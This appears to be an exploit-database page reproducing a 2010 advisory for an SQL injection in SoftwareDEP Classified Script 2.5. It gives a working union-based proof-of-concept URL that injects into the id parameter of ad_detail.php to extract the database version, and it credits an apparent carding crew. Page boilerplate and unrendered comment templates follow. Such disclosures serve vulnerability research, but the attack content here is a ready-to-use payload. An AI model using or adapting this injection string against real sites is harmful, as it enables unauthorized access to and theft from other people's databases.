SoftwareDEP Classified Script 2.5 SQL Injection Vulnerability

2011.01.01

Credit: v3n0m

Risk: Medium

Local: No

Remote: Yes

CVE: N/A

CWE: CWE-89

-----------------------------------------------------------------------
    SoftwareDEP Classified Script 2.5 SQL Injection Vulnerability
-----------------------------------------------------------------------
Author  	: v3n0m (v3n0m666[at]live[dot]com)
Site    	: http://yogyacarderlink.web.id/
Date		: December, 29-2010
Location	: Jakarta, Indonesia
Time Zone	: GMT +7:00

Application	: Classified Script
Price		: $199
Version		: 2.5 Other versions may also be affected
Vendor  	: http://www.softwaredep.com/classified-script.html

Exploit & p0c
_____________

**[SQLi]
http://127.0.0.1/[path]/ad_detail.php?id=[SQLi]
http://127.0.0.1/[path]/ad_detail.php?id=-9999+union+all+select+1,2,3,4,version(),6,7,8,9,10,11,12,13,14,15,16,17,18,19--
_________________________________________________

All YOGYACARDERLINK Crew & My Beloved Jovita Andy
_________________________________________________

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

SoftwareDEP Classified Script 2.5 SQL Injection Vulnerability

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.